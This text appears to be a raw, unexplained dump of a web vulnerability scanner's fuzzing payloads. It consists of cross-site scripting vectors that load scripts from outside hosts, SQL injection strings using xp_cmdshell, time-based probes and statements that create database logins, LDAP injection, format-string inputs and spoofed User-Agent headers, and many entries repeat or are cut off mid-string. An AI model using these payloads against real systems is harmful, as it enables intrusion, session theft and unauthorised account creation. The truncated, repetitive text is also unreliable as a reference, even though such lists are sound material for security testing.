Gecko) User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) C User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6)) User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3. User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.cen User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0 User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14 User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT) User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0) User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727 User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Config User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KH User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) C User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6)) User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3. User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.cen User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0 User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14 User-Agent: Wget/1.8.2 User-Agent: Wget/1.8.2 width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) with(document.__parent__)alert(1) with(document.__parent__)alert(1) x' and members.email is NULL; -- x' and members.email is NULL; -- x' and userid is NULL; -- x' and userid is NULL; -- XSS XSS XSS XSS XSS STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> y=alert;content[y](123) y=alert;content[y](123) ]]> ]]> ` SRC="http://ha.ckers.org/xss.js"> ` SRC="http://ha.ckers.org/xss.js"> `> alert(5) `> alert(5) %%20n %%20s %.2049d %08x %p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%s%s%s %x%x%x%x <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SC </TITLE><SCRIPT>alert("XSS");</SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BODY BACKGROUND="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <DIV STYLE="background-image: url(javascript:alert('XSS') <DIV STYLE="width: expression(alert('XSS'));"> <HTML xmlns:xss> <?import namespace="xss" implementation="ht <IFRAME SRC="javascript:alert('XSS');"></IFRAME& <IMG DYNSRC="javascript:alert('XSS');"> <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " <IMG SRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariabl <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <IMG SRC=javascript:alert("XSS")> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS')" <LINK REL="stylesheet" HREF="http://testsite.com/xss.css" <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(& <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;U <META HTTP-EQUIV="Link" Content="<http://testsite.com/xs <SCRIPT a=">" SRC="http://testsite.com/xss.js">& <SCRIPT a="blah" '' SRC="http://testsite.com/xss.js& <SCRIPT a=`>` SRC="http://testsite.com/xss.js">& <SCRIPT a=">'>" SRC="http://testsite.com/xss.js& <SCRIPT SRC=http://testsite.com/xss.js></SCRIPT> <SCRIPT SRC=http://testsite.com/xss.js <SCRIPT/XSS SRC="http://testsite.com/xss.js"></SCRIP <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> <STYLE TYPE="text/javascript">alert('XSS');</STY <STYLE type="text/css">BODY{background:url("javascript: <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE& <XML ID="xss"><I><B><IMG SRC="javas<!-- -- <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(http://testsite.com/xss.htc);& ' or 1=1 -- ' union (select NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- '; exec master..xp_cmdshell 'ping 10.10.1.2'-- '; if not((select serverproperty('isintegratedsecurityonly')) 1) waitfor delay '0:0:2' -- '; if not(select system_user) 'sa' waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) 0) waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) 8) waitfor delay '0:0:2' -- *(|(objectclass=*)) *)(uid=*))(|(uid=* *| 1 and 1=1 1 and user_name() = 'dbo' 1 or 1=1 1'1 admin* create user name identified by pass123 temporary tablespace temp default tablespace users; exec sp_addlogin 'name' , 'password' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) nnosauzu nnosauzu nnosauzu nnosauzu nnosauzu! nnosauzu%%20n nnosauzu%%20s nnosauzu%.2049d nnosauzu%08x nnosauzu%p%p%p%p%p%p%p%p%p%p nnosauzu%s%p%x%d nnosauzu%s%s%s%s nnosauzu%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s nnosauzu%x%x%x%x nnosauzu<!--[if gte IE 4]> <SCRIPT>alert('XSS');< nnosauzu</TITLE><SCRIPT>alert("XSS");</SCRIPT> nnosauzu<<SCRIPT>alert("XSS");//<</SCRIPT> nnosauzu<BASE HREF="javascript:alert('XSS');//"> nnosauzu<BODY BACKGROUND="javascript:alert('XSS');"> nnosauzu<BR SIZE="&{alert('XSS')}"> nnosauzu<DIV STYLE="background-image: url(javascript:alert('XSS' nnosauzu<DIV STYLE="width: expression(alert('XSS'));" nnosauzu<HTML xmlns:xss> <?import namespace="xss" implementation= nnosauzu<IFRAME SRC="javascript:alert('XSS');"></ nnosauzu<IMG SRC="javascript:alert('XSS');"> nnosauzu<IMG DYNSRC="javascript:alert('XSS');"> nnosauzu<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?som nnosauzu<IMG SRC='vbscript:msgbox("XSS")'> nnosauzu<IMG SRC="livescript:[code]"> nnosauzu<IMG SRC=javascript:alert("XSS")> nnosauzu<IMG SRC="jav ascript:alert('XSS');"> nnosauzu<IMG SRC="jav
ascript:alert('XSS');" nnosauzu<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) & nnosauzu<IMG SRC="javascript:alert('XSS')" nnosauzu<LINK REL="stylesheet" HREF="http://testsite.com/xss nnosauzu<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:ale nnosauzu<META HTTP-EQUIV="refresh" CONTENT="0; URL=http:/ nnosauzu<META HTTP-EQUIV="Link" Content="<http://testsite.co nnosauzu<SCRIPT SRC=http://testsite.com/xss.js></SCRIPT> nnosauzu<SCRIPT/XSS SRC="http://testsite.com/xss.js">< nnosauzu<SCRIPT SRC=http://testsite.com/xss.js nnosauzu<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> nnosauzu<SCRIPT a=">" SRC="http://testsite.com/xss.js nnosauzu<SCRIPT a="blah" '' SRC="http://testsite.com/ nnosauzu<SCRIPT a=`>` SRC="http://testsite.com/xss.js nnosauzu<SCRIPT a=">'>" SRC="http://testsite.com/ nnosauzu<STYLE TYPE="text/javascript">alert('XSS');< nnosauzu<STYLE type="text/css">BODY{background:url("javascr nnosauzu<TABLE BACKGROUND="javascript:alert('XSS')">< nnosauzu<XML ID="xss"><I><B><IMG SRC="javas<! nnosauzu<XSS STYLE="xss:expression(alert('XSS'))"> nnosauzu<XSS STYLE="behavior: url(http://testsite.com/xss.htc nnosauzu' or 1=1 -- nnosauzu' or username is not NULL or username = ' nnosauzu' union (select NULL, (select @@version)) -- nnosauzu' union (select NULL, NULL, NULL, (select @@version)) -- nnosauzu' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- nnosauzu'; exec master..xp_cmdshell 'ping 10.10.1.2'-- nnosauzu'; if not(substring((select @@version),25,1) 0) waitfor delay '0:0:2' -- nnosauzu'; if not(substring((select @@version),25,1) 8) waitfor delay '0:0:2' -- nnosauzu'; if not(select system_user) 'sa' waitfor delay '0:0:2' -- nnosauzu'; if not((select serverproperty('isintegratedsecurityonly')) 1) waitfor delay '0:0:2' -- nnosauzu( nnosauzu) nnosauzu*(|(objectclass=*)) nnosauzu*)(uid=*))(|(uid=* nnosauzu*| nnosauzu-1 nnosauzu0x100 nnosauzu0x10000 nnosauzu0x3fffffff nnosauzu0x7fffffff nnosauzu0xfffffffe nnosauzu1 nnosauzu1 and user_name() = 'dbo' nnosauzu1 and user_name() = 'dbo' nnosauzu1 exec sp_ (or exec xp_) nnosauzu1 or 1=1 nnosauzu1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- nnosauzu1' and 1=(select count(*) from tablenames); -- nnosauzu1\'1 nnosauzuadmin* nnosauzucreate user name identified by pass123 temporary tablespace temp default tablespace users; nnosauzuexec sp_addlogin 'name' , 'password' nnosauzuinsert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123 nnosauzuinsert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + cha nnosauzum nnosauzum! nnosauzum! nnosauzum" nnosauzum# nnosauzum$ nnosauzum$ nnosauzum% nnosauzum& nnosauzum& nnosauzum' nnosauzum( nnosauzum) nnosauzum) nnosauzum* nnosauzum+ nnosauzum+ nnosauzum, nnosauzum- nnosauzum. nnosauzum/ nnosauzum0 nnosauzum0 nnosauzum0 nnosauzum1 nnosauzum1 nnosauzum2 nnosauzum2 nnosauzum2 nnosauzum3 nnosauzum3 nnosauzum3 nnosauzum4 nnosauzum4 nnosauzum4 nnosauzum5 nnosauzum5 nnosauzum5 nnosauzum6 nnosauzum6 nnosauzum6 nnosauzum7 nnosauzum7 nnosauzum7 nnosauzum8 nnosauzum8 nnosauzum8 nnosauzum8 nnosauzum9 nnosauzum9 nnosauzum: nnosauzum; nnosauzum; nnosauzum= nnosauzum= nnosauzum> nnosauzum? nnosauzum? nnosauzum@ nnosauzumA nnosauzuma nnosauzumA nnosauzuma nnosauzuma nnosauzumA nnosauzuma nnosauzumB nnosauzumb nnosauzumB nnosauzumB nnosauzumC nnosauzumc nnosauzumC nnosauzumc nnosauzumc nnosauzumC nnosauzumC nnosauzumc nnosauzumD nnosauzumd nnosauzumD nnosauzumE nnosauzume nnosauzumE nnosauzume nnosauzume nnosauzumE nnosauzumE nnosauzumF nnosauzumf nnosauzumF nnosauzumF nnosauzumG nnosauzumg nnosauzumG nnosauzumg nnosauzumg nnosauzumG nnosauzumH nnosauzumh nnosauzumH nnosauzumH nnosauzumI nnosauzumi nnosauzumI nnosauzumi nnosauzumi nnosauzumI nnosauzumJ nnosauzumj nnosauzumJ nnosauzumJ nnosauzumK nnosauzumk nnosauzumK nnosauzumk nnosauzumk nnosauzumK nnosauzumL nnosauzuml nnosauzumL nnosauzumL nnosauzumM nnosauzumm nnosauzumM nnosauzumm nnosauzumm nnosauzumM nnosauzumN nnosauzumn nnosauzumN nnosauzumN nnosauzumO nnosauzumo nnosauzumO nnosauzumo nnosauzumo nnosauzumO nnosauzumove nnosauzumP nnosauzump nnosauzumP nnosauzumP nnosauzumQ nnosauzumq nnosauzumQ nnosauzumq nnosauzumq nnosauzumQ nnosauzumR nnosauzumr nnosauzumR nnosauzumR nnosauzumS nnosauzums nnosauzumS nnosauzums nnosauzums nnosauzumS nnosauzumT nnosauzumt nnosauzumT nnosauzumT nnosauzumU nnosauzumu nnosauzumU nnosauzumu nnosauzumu nnosauzumU nnosauzumV nnosauzumv nnosauzumV nnosauzumV nnosauzumW nnosauzumw nnosauzumW nnosauzumw nnosauzumw nnosauzumW nnosauzumX nnosauzumx nnosauzumX nnosauzumY nnosauzumy nnosauzumY nnosauzumy nnosauzumy nnosauzumY nnosauzumZ nnosauzumz nnosauzumZ nnosauzum[ nnosauzum\ nnosauzum] nnosauzum^ nnosauzum^ nnosauzum_ nnosauzum` nnosauzum` nnosauzum{ nnosauzum| nnosauzum| nnosauzum} nnosauzum~ nnosauzum~ nnosauzuoptions nnosauzuperl -e 'print "&<SCR\0IPT>alert("XSS")</SCR nnosauzupost nnosauzuproppatch nnosauzuput nnosauzutrace nnosauzuunlock nnosauzuUser-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT) nnosauzuUser-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0) nnosauzuUser-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1 nnosauzuUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2 nnosauzuUser-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2. nnosauzuUser-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/52 nnosauzuUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, lik nnosauzuUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like nnosauzuUser-Agent: Wget/1.8.2 nnosauzuUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6)) nnosauzuUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Fi nnosauzuUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1 nnosauzuUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Fir nnosauzuUser-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0 nnosauzuXSS STYLE=xss:e/**/xpression(alert('XSS'))> nnosauzuXSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IP sex User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT) User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0) User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727 User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Config User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KH User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) C User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6)) User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3. User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.cen User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0 User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14 User-Agent: Wget/1.8.2 XSS STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>